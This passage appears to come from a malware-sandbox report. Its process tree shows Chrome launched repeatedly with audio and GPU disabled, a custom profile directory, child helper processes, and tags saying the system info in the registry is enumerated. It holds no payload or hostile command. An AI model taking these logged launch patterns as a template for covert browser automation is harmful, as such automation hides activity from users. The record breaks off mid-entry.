      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1136 --field-trial-handle=1288,i,6247291781457121578,15938770571033690612,131072 /prefetch:2
      4⤵
      PID:6052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1460 --field-trial-handle=1288,i,6247291781457121578,15938770571033690612,131072 /prefetch:8
      4⤵
      PID:3120
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:3184
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3288
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1192 --field-trial-handle=1292,i,12877361903351853825,920419904338163597,131072 /prefetch:2
      4⤵
      PID:7120
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1436 --field-trial-handle=1292,i,12877361903351853825,920419904338163597,131072 /prefetch:8
      4⤵
      PID:7152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:3196
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3232
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1184 --field-trial-handle=1200,i,15263362720112604153,2566343128350858523,131072 /prefetch:2
      4⤵
      PID:3752
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1424 --field-trial-handle=1200,i,15263362720112604153,2566343128350858523,131072 /prefetch:8
      4⤵
      PID:4852
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:3272
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3396
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1224,i,4783841892780753877,16704629866890612312,131072 /prefetch:2
      4⤵
      PID:3260
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1300 --field-trial-handle=1224,i,4783841892780753877,16704629866890612312,131072 /prefetch:8
      4⤵
      PID:5740
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:3536
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3580
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1160 --field-trial-handle=1300,i,5506408331386027271,4221532664979967483,131072 /prefetch:2
      4⤵
      PID:3372
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1484 --field-trial-handle=1300,i,5506408331386027271,4221532664979967483,131072 /prefetch:8
      4⤵
      PID:3140
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:3668
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3712
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1152 --field-trial-handle=1272,i,1575891928487623962,2320946048817706983,131072 /prefetch:2
      4⤵
      PID:6148
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1436 --field-trial-handle=1272,i,1575891928487623962,2320946048817706983,131072 /prefetch:8
      4⤵
      PID:5440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    PID:3700
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3800
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1152 --field-trial-handle=1376,i,12656909507682182256,2015079098556410769,131072 /prefetch:2
      4⤵
      PID:6832
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1340 --field-trial-handle=1376,i,12656909507682182256,2015079098556410769,131072 /prefetch:8
      4⤵
      PID:6200
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:3844
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1188 --field-trial-handle=1208,i,10390938465745968574,8827405226130405502,131072 /prefetch:2
      4⤵
      PID:7108
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1396 --field-trial-handle=1208,i,10390938465745968574,8827405226130405502,131072 /prefetch:8
      4⤵
      PID:6292
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3192
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1164 --field-trial-handle=1276,i,4818009207741746174,5339235137753000253,131072 /prefetch:2
      4⤵
      PID:6196
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1432 --field-trial-handle=1276,i,4818009207741746174,5339235137753000253,131072 /prefetch:8
      4⤵
      PID:3452
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:1940
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4012
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1096 --field-trial-handle=1304,i,10032189305773096992,2565590228502903478,131072 /prefetch:2
      4⤵
      PID:6916
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1444 --field-trial-handle=1304,i,10032189305773096992,2565590228502903478,131072 /prefetch:8
      4⤵
      PID:5308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4332
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4480
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1148 --field-trial-handle=1268,i,1567650634608493087,509337172666190221,131072 /prefetch:2
      4⤵
      PID:1040
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1444 --field-trial-handle=1268,i,1567650634608493087,509337172666190221,131072 /prefetch:8
      4⤵
      PID:3960
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4408
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4536
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1172 --field-trial-handle=1260,i,2976376357997211915,14515039255661642198,131072 /prefetch:2
      4⤵
      PID:6160
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1408 --field-trial-handle=1260,i,2976376357997211915,14515039255661642198,131072 /prefetch:8
      4⤵
      PID:3976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4632
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1124 --field-trial-handle=1280,i,16209366568554742714,8216804308307947937,131072 /prefetch:2
      4⤵
      PID:800
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1452 --field-trial-handle=1280,i,16209366568554742714,8216804308307947937,131072 /prefetch:8
      4⤵
      PID:7088
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4772
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4880
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
